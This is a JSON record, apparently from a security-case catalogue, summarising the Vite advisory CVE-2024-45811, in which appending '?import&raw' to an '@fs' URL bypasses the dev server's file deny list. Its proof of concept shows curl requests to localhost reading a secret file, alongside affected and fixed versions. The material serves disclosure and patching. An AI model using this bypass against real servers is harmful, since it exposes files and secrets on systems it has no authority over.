{
  "canonical_id": "vite--CVE-2024-45811",
  "system_id": "vite",
  "display_name": "Vite",
  "category": "frameworks",
  "advisory_mode": "core",
  "title": "Vite's `server.fs.deny` is bypassed when using `?import&raw`",
  "summary": "### Summary\nThe contents of arbitrary files can be returned to the browser.\n\n### Details\n`@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists.\n\n### PoC\n```sh\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n\n$ echo \"top secret content\" > /tmp/secret.txt\n\n# expected behaviour\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt\"\n\n    <body>\n      <h1>403 Restricted</h1>\n      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.\n\n# security bypassed\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw\"\nexport default \"top secret content\\n\"\n//# sourceMappingURL=data:application/json;base64,eyJ2...\n```\n\n",
  "published_at": "2024-09-17T18:44:12Z",
  "updated_at": "2026-02-04T04:05:31.919291Z",
  "severity": "low",
  "cvss_score": 3.1,
  "exploit_status": "unknown",
  "source_confidence": "official",
  "official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-9cwx-2883-4wfx",
  "secondary_source_urls": [
    "https://nvd.nist.gov/vuln/detail/CVE-2024-45811",
    "https://github.com/vitejs/vite/commit/4573a6fd6f1b097fb7296a3e135e0646b996b249",
    "https://github.com/vitejs/vite/commit/6820bb3b9a54334f3268fc5ee1e967d2e1c0db34",
    "https://github.com/vitejs/vite/commit/8339d7408668686bae56eaccbfdc7b87612904bd",
    "https://github.com/vitejs/vite/commit/a6da45082b6e73ddfdcdcc06bb5414f976a388d6",
    "https://github.com/vitejs/vite/commit/b901438f99e667f76662840826eec91c8ab3b3e7",
    "https://github.com/vitejs/vite"
  ],
  "aliases": [
    "CVE-2024-45811",
    "GHSA-9cwx-2883-4wfx"
  ],
  "cve_ids": [
    "CVE-2024-45811"
  ],
  "ghsa_ids": [
    "GHSA-9cwx-2883-4wfx"
  ],
  "osv_ids": [
    "GHSA-9cwx-2883-4wfx"
  ],
  "affected_versions": [
    "introduced=5.4.0, fixed<5.4.6",
    "introduced=5.3.0, fixed<5.3.6",
    "introduced=5.2.0, fixed<5.2.14",
    "introduced=4.0.0, fixed<4.5.4",
    "introduced=0, fixed<3.2.11",
    "introduced=5.0.0, fixed<5.1.8"
  ],
  "fixed_versions": [
    "5.4.6",
    "5.3.6",
    "5.2.14",
    "4.5.4",
    "3.2.11",
    "5.1.8"
  ],
  "package_name": "vite",
  "render_markdown": true,
  "case_path": "07-framework-security/frameworks/vite/cases/vite-cve-2024-45811.md",
  "secure_code_topics": [
    "dependency-upgrade-policy",
    "file-upload-validation",
    "proxy-trust-boundary"
  ],
  "status": "generated",
  "triage_reasons": [],
  "metadata": {
    "source_names": [
      "OSV Vite"
    ],
    "source_kinds": [
      "osv-batch"
    ],
    "candidate_count": 1
  }
}